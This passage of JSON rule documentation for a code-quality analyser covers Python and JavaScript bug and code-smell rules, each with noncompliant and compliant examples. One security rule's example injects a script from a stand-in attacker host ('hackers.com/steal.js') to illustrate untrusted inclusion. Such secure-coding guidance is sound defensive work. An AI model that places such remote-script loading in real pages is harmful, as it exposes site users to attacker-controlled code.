Additionally, more recent\nversions of Python raise a SyntaxError when modules containing <code>break<\/code> or <code>continue<\/code> outside of a loop are imported.<\/p>\n<p>Therefore, these statements should not be used outside of loops. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nnarg=len(sys.argv)\nif narg == 1:\n        print('@Usage: input_filename nelements nintervals')\n        break\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif narg == 1:\n        print('@Usage: input_filename nelements nintervals')\n        sys.exit()\n<\/pre>","status":"READY","tags":["rank2"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:S1717","repo":"python","name":"\"\\\" should only be used as an escape character outside of raw strings","htmlDesc":"<p>Typically, backslashes are seen only as part of escape sequences. Therefore, the use of a backslash outside of a raw string or escape sequence\nlooks suspiciously like a broken escape sequence. <\/p>\n<p>Characters recognized as escape-able are: <code>abfnrtvox\\'\"<\/code><\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ns = \"Hello \\world.\"\nt = \"Nice to \\ meet you\"\nu = \"Let's have \\ lunch\"\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ns = \"Hello world.\"\nt = \"Nice to \\\\ meet you\"\nu = r\"Let's have \\ lunch\"  # raw string\n<\/pre>","status":"READY","tags":["rank3"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:S1763","repo":"python","name":"Jump statements should not be followed by other statements","htmlDesc":"<p>Jump statements (<code>return<\/code>, <code>break<\/code>, <code>continue<\/code>, and <code>raise<\/code>) move control flow out of the current code\nblock. Typically, any statements in a block that come after a jump are simply wasted keystrokes lying in wait to confuse the unwary. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ndef fun(a):\n  i = 10\n  return i + a       # Noncompliant\n  i += 1             # this is never executed\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndef fun(a):\n  i = 10\n  return i + a\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.1 - There shall be no unreachable code <\/li>\n  <li> MISRA C++:2008, 0-1-1 - A project shall not contain unreachable code <\/li>\n  <li> MISRA C++:2008, 0-1-9 - There shall be no dead code <\/li>\n  <li> MISRA C:2012, 2.1 - A project shall not contain unreachable code <\/li>\n  <li> MISRA C:2012, 2.2 - There shall be no dead code <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/561.html\">MITRE, CWE-561<\/a> - Dead Code <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/uQCSBg\">CERT, MSC56-J.<\/a> - Detect and remove superfluous code and values <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:S1764","repo":"python","name":"Identical expressions should not be used on both sides of a binary operator","htmlDesc":"<p>Using the same value on either side of a binary operator is almost always a mistake. In the case of logical operators, it is either a copy\/paste\nerror and therefore a bug, or it is simply wasted code, and should be simplified. In the case of bitwise operators and most binary mathematical\noperators, having the same value on both sides of an operator yields predictable results, and should be simplified.<\/p>\n<p>This rule ignores <code>*<\/code>, <code>+<\/code>, and <code>=<\/code>. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif a == a: # Noncompliant\n    work()\n\nif  a != a: # Noncompliant\n    work()\n\nif  a == b and a == b: # Noncompliant\n    work()\n\nif a == b or a == b: # Noncompliant\n    work()\n\nj = 5 \/ 5 # Noncompliant\nk = 5 - 5 # Noncompliant\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The following are ignored:<\/p>\n<ul>\n  <li> The expression <code>1 &lt;&lt; 1<\/code> <\/li>\n<\/ul>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n  <li> <a href='\/coding_rules#rule_key=python%3AS1656'>S1656<\/a> - Implements a check on <code>=<\/code>. <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:S1845","repo":"python","name":"Methods and field names should not differ only by capitalization","htmlDesc":"<p>Looking at the set of methods and fields in a <code>class<\/code> and finding two that differ only by capitalization is confusing to users of the\nclass.<\/p>\n<p>This situation may simply indicate poor naming. Method names should be action-oriented, and thus contain a verb, which is unlikely in the case\nwhere both a method and a field have the same name (with or without capitalization differences). However, renaming a public method could be disruptive\nto callers. 
Therefore renaming the member is the recommended action.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass SomeClass:\n    lookUp = false\n    def lookup():       # Non-compliant; method name differs from field name only by capitalization\n        pass\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass SomeClass:\n    lookUp = false\n    def getLookUp():\n        pass\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Python","params":[],"type":"CODE_SMELL"},{"key":"python:S1862","repo":"python","name":"Related \"if\/else if\" statements should not have the same condition","htmlDesc":"<p>A chain of <code>if<\/code>\/<code>else if<\/code> statements is evaluated from top to bottom. At most, only one branch will be executed: the first\none with a condition that evaluates to <code>true<\/code>. <\/p>\n<p>Therefore, duplicating a condition automatically leads to dead code. Usually, this is due to a copy\/paste error. At best, it's simply dead code and\nat worst, it's a bug that is likely to induce further bugs as the code is maintained, and obviously it could lead to unexpected behavior. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif param == 1:\n  openWindow()\nelif param == 2:\n  closeWindow()\nelif param == 1:            # Noncompliant\n  moveWindowToTheBackground()\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif param == 1:\n  openWindow()\nelif param == 2:\n  closeWindow()\nelif param == 3:\n  moveWindowToTheBackground()\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:S2711","repo":"python","name":"\"yield\" and \"return\" should not be used outside functions","htmlDesc":"<p><code>yield<\/code> and <code>return<\/code> only make sense in the context of functions. Using them outside a function raises a\n<code>SyntaxError<\/code>. To break out of a loop, use <code>break<\/code> instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass MyClass:\n    while True:\n        return False #Noncompliant\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:S2712","repo":"python","name":"\"return\" and \"yield\" should not be used in the same function","htmlDesc":"<p>Functions that use <code>yield<\/code> are known as \"generators\", and generators cannot <code>return<\/code> values. Similarly, functions that use\n<code>return<\/code> cannot use <code>yield<\/code>. 
Doing so will cause a <code>SyntaxError<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ndef adder(n):\n     num = 0\n     while num &lt; n:\n         yield num\n         num += 1\n     return num  #Noncompliant\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:S2733","repo":"python","name":"\"__exit__\" should accept type, value, and traceback arguments","htmlDesc":"<p>The <code>__exit__<\/code> method is invoked with four arguments: self, type, value and traceback. Leave one of these out of the method declaration\nand the result will be a <code>TypeError<\/code> at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass MyClass:\n   def __enter__(self):\n       pass\n   def __exit__(self, exc_type, exc_val):  # Noncompliant\n       pass\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:S2734","repo":"python","name":"\"__init__\" should not return a value","htmlDesc":"<p>By contract, every Python function returns something, even if it's the <code>None<\/code> value, which can be returned implicitly by omitting the\n<code>return<\/code> statement, or explicitly. <\/p>\n<p>The <code>__init__<\/code> method is required to return <code>None<\/code>. A <code>TypeError<\/code> will be raised if the <code>__init__<\/code>\nmethod either <code>yield<\/code>s or <code>return<\/code>s any expression other than <code>None<\/code>. 
Returning some expression that evaluates to\n<code>None<\/code> will not raise an error, but is considered bad practice.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass MyClass(object):\n    def __init__(self):\n        self.message = 'Hello'\n        return self  # Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass(object):\n    def __init__(self):\n        self.message = 'Hello'\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:S3776","repo":"python","name":"Cognitive Complexity of functions should not be too high","htmlDesc":"<p>Cognitive Complexity is a measure of how hard the control flow of a function is to understand. Functions with high Cognitive Complexity will be\ndifficult to maintain.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/redirect.sonarsource.com\/doc\/cognitive-complexity.html\">Cognitive Complexity<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"Python","params":[{"key":"threshold","htmlDesc":"The maximum authorized complexity.","defaultValue":"15","type":"INTEGER"}],"type":"CODE_SMELL"}],"language":"py","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};
      Severity: Minor
      Found in docs/py.html by fixme

      BUG found
      Open

<\/li>\n  <li> MISRA C:2012, 16.6 - Every switch statement shall have at least two switch-clauses <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S138","repo":"javascript","name":"Functions should not have too many lines","htmlDesc":"<p>A function that grows too large tends to aggregate too many responsibilities.<\/p>\n<p>Such functions inevitably become harder to understand and therefore harder to maintain. <\/p>\n<p>Above a specific threshold, it is strongly advised to refactor into smaller functions which focus on well-defined tasks.<\/p>\n<p>Those smaller functions will not only be easier to understand, but also probably easier to test.<\/p>\n<h2>Exceptions<\/h2>\n<p>This rule ignores Immediately Invoked Function Expressions (IIFE), which are functions that are created and invoked without ever being assigned\na name.<\/p>\n<pre>\n(function () { \/\/ Ignored by this rule\n\n  function open() {  \/\/ Classic function declaration; not ignored\n    \/\/ ...\n  }\n\n  function read() {\n    \/\/ ...\n  }\n\n  function readlines() {\n    \/\/ ...\n  }\n})();\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"max","htmlDesc":"Maximum authorized lines in a function","defaultValue":"200","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S1442","repo":"javascript","name":"\"alert(...)\" should not be used","htmlDesc":"<p><code>alert(...)<\/code> can be useful for debugging during development, but in production mode this kind of pop-up could expose sensitive\ninformation to attackers, and should never be displayed. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(unexpectedCondition)\n{\n  alert(\"Unexpected Condition\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489.html\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S1656","repo":"javascript","name":"Variables should not be self-assigned","htmlDesc":"<p>There is no reason to re-assign a variable to itself. Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction setName(name) {\n    name = name;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction setName(name) {\n    this.name = name;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S1871","repo":"javascript","name":"Two branches in a conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having two <code>cases<\/code> in a <code>switch<\/code> statement or two branches in an <code>if<\/code> chain with the same implementation is at\nbest duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in an <code>if<\/code> chain they should\nbe combined, or for a <code>switch<\/code>, one should fall through to the other. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (i) {\n  case 1:\n    doFirstThing();\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  case 3:  \/\/ Noncompliant; duplicates case 1's implementation\n    doFirstThing();\n    doSomething();\n    break;\n  default:\n    doTheRest();\n}\n\nif (a &gt;= 0 &amp;&amp; a &lt; 10) {\n  doFirstThing();\n  doTheThing();\n}\nelse if (a &gt;= 10 &amp;&amp; a &lt; 20) {\n  doTheOtherThing();\n}\nelse if (a &gt;= 20 &amp;&amp; a &lt; 50) {\n  doFirstThing();\n  doTheThing();  \/\/ Noncompliant; duplicates first condition\n}\nelse {\n  doTheRest();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (i) {\n  case 1:\n  case 3:\n    doFirstThing();\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  default:\n    doTheRest();\n}\n\nif ((a &gt;= 0 &amp;&amp; a &lt; 10) || (a &gt;= 20 &amp;&amp; a &lt; 50)) {\n  doFirstThing();\n  doTheThing();\n}\nelse if (a &gt;= 10 &amp;&amp; a &lt; 20) {\n  doTheOtherThing();\n}\nelse {\n  doTheRest();\n}\n<\/pre>\n<p>or <\/p>\n<pre>\nswitch (i) {\n  case 1:\n    doFirstThing();\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  case 3:\n    doFirstThing();\n    doThirdThing();\n    break;\n  default:\n    doTheRest();\n}\n\nif (a &gt;= 0 &amp;&amp; a &lt; 10) {\n  doFirstThing();\n  doTheThing();\n}\nelse if (a &gt;= 10 &amp;&amp; a &lt; 20) {\n  doTheOtherThing();\n}\nelse if (a &gt;= 20 &amp;&amp; a &lt; 50) {\n  doFirstThing();\n  doTheThirdThing();\n}\nelse {\n  doTheRest();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Blocks in an <code>if<\/code> chain that contain a single line of code are ignored, as are blocks in a <code>switch<\/code> statement that contain a\nsingle line of code with or without a following 
<code>break<\/code>.<\/p>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1994","repo":"javascript","name":"\"for\" loop increment clauses should modify the loops' counters","htmlDesc":"<p>It can be extremely confusing when a <code>for<\/code> loop's counter is incremented outside of its increment clause. In such cases, the increment\nshould be moved to the loop's increment clause if at all possible.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (i = 0; i &lt; 10; j++) {  \/\/ Noncompliant\n  \/\/ ...\n  i++;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (i = 0; i &lt; 10; i++, j++) {\n  \/\/ ...\n}\n<\/pre>\n<p>Or<\/p>\n<pre>\nfor (i = 0; i &lt; 10; i++) {\n  \/\/ ...\n  j++;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2123","repo":"javascript","name":"Values should not be uselessly incremented","htmlDesc":"<p>A value that is incremented or decremented and then not stored is at best wasted code and at worst a bug.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar i = 0;\ni = i++; \/\/ Noncompliant; i is still zero\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar i = 0;\ni++;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2138","repo":"javascript","name":"\"undefined\" should not be assigned","htmlDesc":"<p><code>undefined<\/code> is the value you get for variables and properties which have not yet been created. Use the same value to reset an existing\nvariable and you lose the ability to distinguish between a variable that exists but has no value and a variable that does not yet exist. 
Instead,\n<code>null<\/code> should be used, allowing you to tell the difference between a property that has been reset and one that was never created.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myObject = {};\n\n\/\/ ...\nmyObject.fname = undefined;  \/\/ Noncompliant\n\/\/ ...\n\nif (myObject.lname == undefined) {\n  \/\/ property not yet created\n}\nif (myObject.fname == undefined) {\n  \/\/ no real way of knowing the true state of myObject.fname\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar myObject = {};\n\n\/\/ ...\nmyObject.fname = null;\n\/\/ ...\n\nif (myObject.lname == undefined) {\n  \/\/ property not yet created\n}\nif (myObject.fname == undefined) {\n  \/\/ no real way of knowing the true state of myObject.fname\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2208","repo":"javascript","name":"Wildcard imports should not be used","htmlDesc":"<p>On the principle that clearer code is better code, you should explicitly <code>import<\/code> the things you want to use in a module. Using\n<code>import *<\/code> imports everything in the module, and runs the risk of confusing maintainers. Similarly, <code>export * from \"module\";<\/code>\nimports and then re-exports everything in the module, and runs the risk of confusing not just maintainers but also users of the module.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nimport * as Imported from \"aModule\";  \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2228","repo":"javascript","name":"Console logging should not be used","htmlDesc":"<p>Debug statements are always useful during development. 
But include them in production code - particularly in code that runs client-side - and you\nrun the risk of inadvertently exposing sensitive information, slowing down the browser, or even erroring-out the site for some users.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconsole.log(password_entered); \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A6-Sensitive_Data_Exposure\">OWASP Top Ten 2013 Category A6<\/a> - Sensitive Data Exposure\n  <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2234","repo":"javascript","name":"Parameters should be passed in the correct order","htmlDesc":"<p>When the names of arguments in a function call match the names of the function parameters, it contributes to clearer, more readable code. However,\nwhen the names match, but are passed in a different order than the function parameters, it indicates a mistake in the parameter order which will\nlikely lead to unexpected results.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide(divisor, dividend) {\n  return divisor\/dividend;\n}\n\nfunction doTheThing() {\n  var divisor = 15;\n  var dividend = 5;\n\n  var result = divide(dividend, divisor);  \/\/ Noncompliant; operation succeeds, but result is unexpected\n  \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction divide(divisor, dividend) {\n  return divisor\/dividend;\n}\n\nfunction doTheThing() {\n  var divisor = 15;\n  var dividend = 5;\n\n  var result = divide(divisor, dividend);\n  \/\/...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2251","repo":"javascript","name":"A \"for\" loop update clause should move the counter in the right direction","htmlDesc":"<p>A <code>for<\/code> loop with a stop condition that can never be reached, such as one with a counter that moves in the wrong 
direction, will run\ninfinitely. While there are occasions when an infinite loop is intended, the convention is to construct such loops as <code>while<\/code> loops. More\ntypically, an infinite <code>for<\/code> loop is a bug. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (var i = 0; i &lt; strings.length; i--) { \/\/ Noncompliant;\n  \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (var i = 0; i &lt; strings.length; i++) {\n  \/\/...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/zYEzAg\">CERT, MSC54-J.<\/a> - Avoid inadvertent wrapping of loop counters <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2392","repo":"javascript","name":"Variables should be defined in the blocks where they are used","htmlDesc":"<p>A variable that is declared at function scope, but only used inside a single block should be declared in that block, and variables that are\ndeclared inside a block but used outside of it (which is possible with a <code>var<\/code>-style declaration) should be declared outside the block.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething(a, b) {\n  var i;  \/\/ Noncompliant; should be declared in if-block\n  if (a &gt; b) {\n    i = a;\n    console.log(i);\n    var x = a - b;  \/\/ Noncompliant; should be declared outside if-block\n  }\n\n  if (a &gt; 4) {\n   console.log(x);\n  }\n\n  return a+b;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(a, b) {\n  var x = a - b;\n\n  if (a &gt; b) {\n    var i = a;\n    console.log(i);\n  }\n\n  if (a &gt; 4) {\n   console.log(x);\n  }\n\n  return a+b;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2424","repo":"javascript","name":"Built-in objects should not be overridden","htmlDesc":"<p>Overriding an object changes its behavior and could potentially 
impact all code using that object. Overriding standard, built-in objects could\ntherefore have broad, potentially catastrophic effects on previously-working code.<\/p>\n<p>This rule detects overrides of the following native objects:<\/p>\n<ul>\n  <li> Fundamental objects - Object, Function, Boolean, Symbol, Error, EvalError, InternalError, RangeError, ReferenceError, SyntaxError, TypeError,\n  URIError <\/li>\n  <li> Numbers and dates - Number, Math, Date <\/li>\n  <li> Text processing - String, RegExp <\/li>\n  <li> Indexed collections - Array, Int8Array, Uint8Array, Uint8ClampedArray, Int16Array, Uint16Array, Int32Array, Uint32Array, Float32Array,\n  Float64Array <\/li>\n  <li> Keyed collections - Map, Set, WeakMap, WeakSet <\/li>\n  <li> Structured data - ArrayBuffer, DataView, JSON <\/li>\n  <li> Control abstraction objects - Promise <\/li>\n  <li> Reflection - Reflect, Proxy <\/li>\n  <li> Internationalization - Intl <\/li>\n  <li> Non-standard objects - Generator, Iterator, ParallelArray, StopIteration <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2427","repo":"javascript","name":"The base should be provided to \"parseInt\"","htmlDesc":"<p>The <code>parseInt<\/code> function has two versions, one that takes a base value as a second argument, and one that does not. Unfortunately using\nthe single-arg version can result in unexpected results on older browsers. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nparseInt(\"010\");  \/\/ Noncompliant; pre-2013 browsers may return 8\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nparseInt(\"010\", 10);\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2432","repo":"javascript","name":"Setters should not return values","htmlDesc":"<p>Functions declared with the <code>set<\/code> keyword will automatically return the values they were passed. 
Thus any value explicitly returned from\na setter will be ignored, and explicitly returning a value is an error.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar person = {\n  \/\/ ...\n  set name(name) {\n    this.name = name;\n    return 42;  \/\/ Noncompliant\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar person = {\n  \/\/ ...\n  set name(name) {\n    this.name = name;\n  }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2508","repo":"javascript","name":"The names of model properties should not contain spaces","htmlDesc":"<p>When using the Backbone.js framework, the names of model attributes should not contain spaces. This is because the Events object accepts\nspace-delimited lists of events, so an attribute with spaces in its name could be misinterpreted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nPerson = Backbone.Model.extend({\n        defaults: {\n            'first name': 'Bob',      \/\/ Noncompliant\n            'birth date': new Date()  \/\/ Noncompliant\n        },\n    });\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nPerson = Backbone.Model.extend({\n        defaults: {\n            firstName: 'Bob',\n            birthDate: new Date()\n        },\n    });\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2583","repo":"javascript","name":"Conditionally executed blocks should be reachable","htmlDesc":"<p>Conditional expressions which are always <code>true<\/code> or <code>false<\/code> can lead to dead code. 
Such code is always buggy and should never\nbe used in production.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\na = false;\nif (a) { \/\/ Noncompliant\n  doSomething(); \/\/ never executed\n}\n\nif (!a || b) { \/\/ Noncompliant; \"!a\" is always \"true\", \"b\" is never evaluated\n  doSomething();\n} else {\n  doSomethingElse(); \/\/ never executed\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n  <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/570.html\">MITRE, CWE-570<\/a> - Expression is Always False <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2589","repo":"javascript","name":"Boolean expressions should not be gratuitous","htmlDesc":"<p>If a boolean expression doesn't change the evaluation of the condition, then it is entirely unnecessary, and can be removed. 
If it is gratuitous\nbecause it does not match the programmer's intent, then it's a bug and the expression should be fixed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\na = true;\nif (a) { \/\/ Noncompliant\n  doSomething();\n}\n\nif (b &amp;&amp; a) { \/\/ Noncompliant; \"a\" is always \"true\"\n  doSomething();\n}\n\nif (c || !a) { \/\/ Noncompliant; \"!a\" is always \"false\"\n  doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\na = true;\nif (foo(a)) {\n  doSomething();\n}\n\nif (b) {\n  doSomething();\n}\n\nif (c) {\n  doSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n  <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2611","repo":"javascript","name":"Untrusted content should not be included","htmlDesc":"<p>Including content in your site from an untrusted source can expose your users to attackers and even compromise your own site. 
For that reason, this\nrule raises an issue for each non-relative URL.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction include(url) {\n  var s = document.createElement(\"script\");\n  s.setAttribute(\"type\", \"text\/javascript\");\n  s.setAttribute(\"src\", url);\n  document.body.appendChild(s);\n}\ninclude(\"http:\/\/hackers.com\/steal.js\")  \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/829\">MITRE, CWE-829<\/a> - Inclusion of Functionality from Untrusted Control Sphere <\/li>\n  <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Risky Resource Management <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"domainsToIgnore","htmlDesc":"Comma-delimited list of domains to ignore. Regexes may be used, e.g. (.*\\.)?example.com,foo.org","type":"STRING"}],"type":"VULNERABILITY"},{"key":"javascript:S2688","repo":"javascript","name":"\"NaN\" should not be used in comparisons","htmlDesc":"<p><code>NaN<\/code> is not equal to anything, even itself. Testing for equality or inequality against <code>NaN<\/code> will yield predictable results,\nbut probably not the ones you want. <\/p>\n<p>Instead, the best way to see whether a variable is equal to <code>NaN<\/code> is to use <code>Number.isNaN()<\/code>, since ES2015, or 